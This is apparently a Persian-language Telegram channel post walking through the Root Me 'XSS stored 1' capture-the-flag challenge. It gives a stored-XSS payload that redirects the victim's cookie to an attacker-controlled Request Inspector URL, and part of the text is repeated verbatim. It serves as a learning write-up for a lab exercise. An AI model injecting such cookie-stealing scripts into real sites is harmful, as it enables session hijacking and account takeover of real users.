PAIREN (Programming Channel)
شاید برای شما هم پیش اومده باشه که توی ماشین مجازی لینوکس ریختین و میخواید با php یک سرور روی لوکال هاست بسازد و به وسیلهی ngrok اون لینکی که روی لوکال هاست ساختین رو forward کنید و کوکی بردارید اما php سرور جواب نمیده و کار نمیکنه. جوابش این هست که شما وقتی…
میتونید به عوض php سرور از Request Inspector استفاده کنید و کوکی بردارید.
این برداشتن کوکی مال یکی از چالش های روت می هست.(وقتی پیلود رو سابمیت کردید، چند بار صفحهی Request Inspector رو رفرش کنید و چند ثانیه صبر کنید تا ADMIN_COOKIE براتون ارسال بشه. گاهی اوقات لازمه چند بار پیلود رو سابمیت کنید تا بعد ADMIN_COOKIE براتون بیاد.)
چالش root me xss stored 1
برای برداشتن کوکی میتونید از این پیلود استفاده کنید.
<script>document.location="URL?c="+document.cookie</script>
توی قسمت 'URL' باید لینکی که از Request Inspector میگیرید بگذارید.
#امنیت
#XSS
@Pairen_Programmers
این برداشتن کوکی مال یکی از چالش های روت می هست.(وقتی پیلود رو سابمیت کردید، چند بار صفحهی Request Inspector رو رفرش کنید و چند ثانیه صبر کنید تا ADMIN_COOKIE براتون ارسال بشه. گاهی اوقات لازمه چند بار پیلود رو سابمیت کنید تا بعد ADMIN_COOKIE براتون بیاد.)
چالش root me xss stored 1
برای برداشتن کوکی میتونید از این پیلود استفاده کنید.
<script>document.location="URL?c="+document.cookie</script>
توی قسمت 'URL' باید لینکی که از Request Inspector میگیرید بگذارید.
#امنیت
#XSS
@Pairen_Programmers
👍2